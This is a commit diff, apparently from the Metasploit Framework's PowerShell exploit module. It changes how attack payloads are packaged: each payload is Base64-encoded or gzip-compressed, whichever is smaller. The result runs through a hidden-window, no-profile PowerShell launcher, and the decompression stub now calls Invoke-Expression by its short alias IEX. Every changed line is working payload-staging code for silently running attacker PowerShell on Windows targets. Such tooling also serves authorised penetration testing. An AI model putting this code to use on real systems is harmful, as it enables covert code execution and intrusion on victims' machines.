Choose smallest smallest
Meatballs
parent
9aca98a9d4
commit
5add142789
|
|
@ -61,6 +61,20 @@ module Exploit::Powershell
|
|||
return new_subs
|
||||
end
|
||||
|
||||
#
|
||||
# Return an encoded powershell script
|
||||
# Will invoke PSH modifiers as enabled
|
||||
#
|
||||
def encode_script(script_in, eof = nil)
|
||||
# Build script object
|
||||
psh = PshScript.new(script_in)
|
||||
# Invoke enabled modifiers
|
||||
datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
|
||||
mod_method = k.split('::').last.intern
|
||||
psh.send(mod_method)
|
||||
end
|
||||
return psh.encode_code(eof)
|
||||
end
|
||||
#
|
||||
# Return a gzip compressed powershell script
|
||||
# Will invoke PSH modifiers as enabled
|
||||
|
|
@ -80,7 +94,7 @@ module Exploit::Powershell
|
|||
# Runs powershell in hidden window raising interactive proc msg
|
||||
#
|
||||
def run_hidden_psh(ps_code,ps_bin='powershell.exe')
|
||||
ps_args = "-w hidden -nop -e #{ compress_script(ps_code) }"
|
||||
ps_args = "-w hidden -nop -e #{ps_code}"
|
||||
|
||||
ps_wrapper = <<EOS
|
||||
$si=New-Object System.Diagnostics.ProcessStartInfo
|
||||
|
|
@ -116,10 +130,22 @@ EOS
|
|||
end
|
||||
# Determine appropriate architecture, manual method reduces script size
|
||||
ps_bin = wow64 ? '$env:windir+\'\syswow64\WindowsPowerShell\v1.0\powershell.exe\'' : '\'powershell.exe\''
|
||||
|
||||
|
||||
compressed = compress_script(psh_payload)
|
||||
encoded = encode_script(psh_payload)
|
||||
|
||||
if (encoded.length <= compressed.length)
|
||||
smallest_payload = encoded
|
||||
else
|
||||
smallest_payload = compressed
|
||||
end
|
||||
|
||||
# Wrap in hidden runtime
|
||||
psh_payload = run_hidden_psh(psh_payload,ps_bin)
|
||||
final_payload = run_hidden_psh(smallest_payload,ps_bin)
|
||||
|
||||
# Convert to base64 for -encodedcommand execution
|
||||
command = "%COMSPEC% /B /C start /min powershell.exe -nop -c #{psh_payload}\r\n"
|
||||
command = "%COMSPEC% /B /C start /min powershell.exe -nop -c #{final_payload}\r\n"
|
||||
end
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -28,7 +28,18 @@ module Powershell
|
|||
end
|
||||
return numbered
|
||||
end
|
||||
#
|
||||
# Return a Base64 encoded powershell code
|
||||
#
|
||||
def encode_code(eof = nil)
|
||||
# Convert expression to unicode
|
||||
unicode_expression = Rex::Text.to_unicode(code)
|
||||
|
||||
# Base64 encode the unicode expression
|
||||
@code = Rex::Text.encode_base64(unicode_expression)
|
||||
|
||||
return code
|
||||
end
|
||||
#
|
||||
# Return a zlib compressed powershell code
|
||||
#
|
||||
|
|
@ -44,7 +55,7 @@ module Powershell
|
|||
psh_expression = "$stream = New-Object IO.MemoryStream(,"
|
||||
psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
|
||||
# Uncompress and invoke the expression (execute)
|
||||
psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
|
||||
psh_expression << "$(IEX $(New-Object IO.StreamReader("
|
||||
psh_expression << "$(New-Object IO.Compression.GzipStream("
|
||||
psh_expression << "$stream,"
|
||||
psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
|
||||
|
|
|
|||
Loading…
Reference in New Issue